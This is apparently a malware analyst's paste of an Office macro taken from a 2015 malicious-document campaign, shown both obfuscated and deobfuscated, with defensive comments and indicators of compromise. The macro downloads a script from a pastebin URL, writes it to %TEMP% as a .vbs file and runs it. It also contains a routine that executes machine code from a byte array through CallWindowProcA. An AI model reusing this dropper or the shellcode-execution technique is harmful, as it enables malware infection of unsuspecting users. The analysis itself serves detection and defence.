bartblaze

Extracted + deobfuscated macro

May 8th, 2015
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  ' --- Analyst notes (defensive) ---
  ' What this does, as far as the excerpt shows: resolve an exported function
  ' by name at run time (LoadLibraryA + GetProcAddress), write a short
  ' machine-code stub into a local Byte array with RtlMoveMemory, embed the
  ' caller's arguments and the resolved address in that stub, and then run the
  ' array through CallWindowProcA.  The effect is "call any Win32 export whose
  ' name is only known at run time", so the real API names never appear in
  ' the macro's static text.
  ' Params: sLib = DLL name, sMod = export name, Params = call arguments,
  '   each converted with CLng and copied as 4 bytes (32-bit Office assumed;
  '   Long-sized VarPtr values would not hold on 64-bit -- TODO confirm).
  ' Returns: the value CallWindowProcA reports, or 0 (the Long default) when
  '   the export cannot be resolved.
  ' NOTE(review): the Declare statements for LoadLibraryA, GetProcAddress,
  '   RtlMoveMemory and CallWindowProcA are not in this excerpt.  That group
  '   of four declarations appearing together in a document macro is itself a
  '   strong static indicator of this technique (olevba, for example, flags
  '   each of them as suspicious).
  ' NOTE(review): the visible Sub hfyuBJKfdgfdgsdfg never calls this
  '   function; from this excerpt alone it may be dead code or a helper used
  '   by code that is not shown.
  6. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  ' Blanket error suppression: a bad DLL name, a failed copy or a fault in
  ' the stub is hidden rather than surfaced.
  7. On Error Resume Next
  8.     Dim UpICsYhhglV                As Long    ' write cursor into the stub buffer
  ' &HEC00 = 60416 bytes, far larger than the few dozen bytes written below.
  9.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  10.     Dim wZdrB                   As Long    ' loop index over Params
  11.     Dim kQJlHFiPhSQwQic                As Long    ' resolved export address
  12.    
  ' Dynamic resolution: the import never appears in the document's static text.
  13.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  ' Unresolved export: the function result stays at its default of 0.
  14.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  15.    
  ' The stub is assembled at the start of the array; each RtlMoveMemory copies
  ' a literal (or a computed value) and the cursor advances by the same
  ' number of bytes.
  16.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  17.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  18.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  ' Arguments are emitted in reverse order, each as a 1-byte marker followed
  ' by the argument as a 4-byte Long.
  19.     For wZdrB = UBound(Params) To 0 Step -1
  20.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  21.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  22.     Next
  23.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  ' 4-byte displacement from the current cursor to the resolved address
  ' (relative to the cursor, hence the "- UpICsYhhglV - 4").
  24.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  25.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  ' Execution: CallWindowProcA treats the array address as a window procedure
  ' and transfers control to it, so the Byte array runs as code.  Detection
  ' point: CallWindowProcA whose first argument is a VarPtr into a Byte array.
  26.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  27.    
  28. End Function
  29.  
  ' --- Analyst notes (defensive) ---
  ' Downloader / dropper: fetch a script over HTTP, write it to %TEMP% as a
  ' .vbs file and launch it through Shell.Application.  Every string in this
  ' routine is assembled one character at a time with Chr$() so that the URL,
  ' the COM ProgIDs and the file name never appear as literals; the decoded
  ' values are in the "deobfuscated" copy further down the page.
  ' No Option Explicit and no Dim: every name is an implicitly created Variant,
  ' and there is no error handling at all.
  ' Detection points, from the behaviour visible here:
  '   - an Office process instantiating MSXML2.XMLHTTP and issuing a GET to
  '     pastebin.com
  '   - an Office process creating a .vbs file under %TEMP% through
  '     Scripting.FileSystemObject
  '   - an Office process launching that file via Shell.Application.Open
  '     (normally handled by the script host -- confirm against telemetry)
  ' Long runs of Chr$() concatenation are themselves a static heuristic that
  ' macro scanners key on.
  30. Sub hfyuBJKfdgfdgsdfg()
  ' Decoded: the download URL (see the deobfuscated listing).
  31. ouIYHiogeffjgyuFUFYdsg = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(112) & Chr$(97) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(98) & Chr$(105) & Chr$(110) & Chr$(46) & Chr$(99) & Chr$(111) & Chr$(109) & Chr$(47) & Chr$(100) & Chr$(111) & Chr$(119) & Chr$(110) & Chr$(108) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112) & Chr$(63) & Chr$(105) & Chr$(61) & Chr$(86) & Chr$(84) & Chr$(100) & Chr$(57) & Chr$(72) & Chr$(86) & Chr$(107) & Chr$(122)
  ' Decoded: "MSXML2.XMLHTTP" -- the HTTP client object.
  32. Set ertertFFFg = CreateObject(Chr$(77) & Chr$(83) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(50) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  ' Decoded: "GET".  Third argument False = synchronous, so Send blocks until
  ' the response has arrived.
  33. Call ertertFFFg.Open(Chr$(71) & Chr$(69) & Chr$(84), ouIYHiogeffjgyuFUFYdsg, False)
  34. ertertFFFg.Send
  ' Decoded: "Scripting.FileSystemObject".
  35. Set iyuiyui = CreateObject(Chr$(83) & Chr$(99) & Chr$(114) & Chr$(105) & Chr$(112) & Chr$(116) & Chr$(105) & Chr$(110) & Chr$(103) & Chr$(46) & Chr$(70) & Chr$(105) & Chr$(108) & Chr$(101) & Chr$(83) & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(79) & Chr$(98) & Chr$(106) & Chr$(101) & Chr$(99) & Chr$(116))
  ' Decoded: Environ("TEMP") & "\JGuigbjbff3f.vbs" -- the drop path.
  36.    ewwfgfdg = Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  ' Second argument is FSO's Overwrite flag; a nonzero value is treated as
  ' True, so an existing file of that name is replaced.
  37. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  ' The body is written as text, i.e. the downloaded payload is a plain-text
  ' script, not a binary.
  38. riitiyiFF.Write ertertFFFg.ResponseText
  39. riitiyiFF.Close
  ' Decoded: "Shell.Application".
  40. Set oUIYYytgsdvfFF = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
  ' The path is re-assembled here instead of reusing ewwfgfdg; the value is
  ' the same %TEMP%\JGuigbjbff3f.vbs.  Shell.Application.Open on it executes
  ' the dropped script through the shell's .vbs file association.
  41. oUIYYytgsdvfFF.Open Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  42. End Sub
  43.  
  44. =========================================================================================================
  45.  
  46.  
  47.  
  48. <== deobfuscated: ===>
  ' --- Analyst notes (defensive) ---
  ' Identical to the obfuscated copy above: this function contains no encoded
  ' strings, so "deobfuscation" changed nothing.  Its job is to resolve an
  ' export by name at run time (LoadLibraryA + GetProcAddress), build a small
  ' machine-code stub inside a local Byte array via RtlMoveMemory, embed the
  ' arguments and the resolved address in it, and execute the array through
  ' CallWindowProcA.  In other words, a way to reach any Win32 API without
  ' naming it in a Declare.
  ' Params: sLib = DLL name, sMod = export name, Params = arguments, each
  '   converted with CLng and written as 4 bytes (32-bit assumed -- the Long
  '   pointer arithmetic would not hold on 64-bit Office; TODO confirm).
  ' Returns: the CallWindowProcA result, or 0 (Long default) on failed lookup.
  ' NOTE(review): the Declare lines for the four Win32 imports are outside
  '   this excerpt; their co-occurrence in a document macro is a strong static
  '   indicator regardless of how the rest of the code is obfuscated.
  ' NOTE(review): nothing visible on this page calls CallApiByName; the
  '   downloader Sub below works entirely through COM objects.  Whether it is
  '   used elsewhere in the document cannot be told from here.
  49. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  ' Suppresses every run-time error in the routine, so a failed lookup or a
  ' crash inside the stub produces no visible symptom.
  50. On Error Resume Next
  51.     Dim UpICsYhhglV                As Long    ' write cursor into the stub buffer
  ' 60416-byte buffer; only a few dozen bytes are ever written.
  52.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  53.     Dim wZdrB                   As Long    ' index over Params
  54.     Dim kQJlHFiPhSQwQic                As Long    ' address returned by GetProcAddress
  55.  
  56.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  ' Lookup failed: return the default 0 without touching the buffer.
  57.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  58.  
  ' From here on each RtlMoveMemory copies a fixed literal or a computed value
  ' into the array and advances the cursor by the same byte count.
  59.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  60.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  61.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  ' Arguments go in last-to-first, each as a 1-byte marker plus a 4-byte Long.
  62.     For wZdrB = UBound(Params) To 0 Step -1
  63.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  64.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  65.     Next
  66.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  ' Relative 4-byte displacement from the cursor to the resolved address.
  67.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  68.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  ' CallWindowProcA is handed the array's address as the "window procedure",
  ' so the bytes assembled above are executed.  A CallWindowProcA whose first
  ' argument is a VarPtr into a Byte array is the signature to hunt for.
  69.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  70.  
  71. End Function
  72.  
  ' --- Analyst notes (defensive) ---
  ' This is the obfuscated Sub above with every Chr$() chain replaced by its
  ' decoded value.  NOTE(review): the string quotes were dropped in the
  ' decoding, so this listing is a readable rendering rather than compilable
  ' VBA (e.g. the URL and the ProgIDs would need to be quoted).
  ' Behaviour: synchronous HTTP GET of a text payload from pastebin.com,
  ' written to %TEMP%\JGuigbjbff3f.vbs, then launched via Shell.Application.
  ' Indicators a defender can use directly from this listing:
  '   - URL  : http://pastebin.com/download.php?i=VTd9HVkz
  '   - File : %TEMP%\JGuigbjbff3f.vbs, created by an Office process
  '   - Chain: Office -> MSXML2.XMLHTTP -> FileSystemObject -> Shell.Application
  ' No variables are declared and no error handling exists; a failed download
  ' would still create (and try to run) an empty .vbs.
  73. Sub hfyuBJKfdgfdgsdfg()
  ' Payload location (pastebin "download.php" returns the raw paste body).
  74. ouIYHiogeffjgyuFUFYdsg = http://pastebin.com/download.php?i=VTd9HVkz
  75. Set ertertFFFg = CreateObject(MSXML2.XMLHTTP)
  ' Third argument False = synchronous; Send returns only once the body is in.
  76. Call ertertFFFg.Open(GET, ouIYHiogeffjgyuFUFYdsg, False)
  77. ertertFFFg.Send
  78. Set iyuiyui = CreateObject(Scripting.FileSystemObject)
  ' Drop path under the user's temp directory.
  79.    ewwfgfdg = Environ(TEMP)\JGuigbjbff3f.vbs
  ' Second argument is FSO's Overwrite flag; nonzero means an existing file
  ' is replaced.
  80. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  ' The HTTP body is written verbatim as text -- the payload is a script.
  81. riitiyiFF.Write ertertFFFg.ResponseText
  82. riitiyiFF.Close
  83. Set oUIYYytgsdvfFF = CreateObject(Shell.Application)
  ' Executes the dropped file through the shell's .vbs association (the path
  ' is rebuilt instead of reusing ewwfgfdg, but it is the same file).
  84. oUIYYytgsdvfFF.Open Environ(TEMP)\JGuigbjbff3f.vbs
  85. End Sub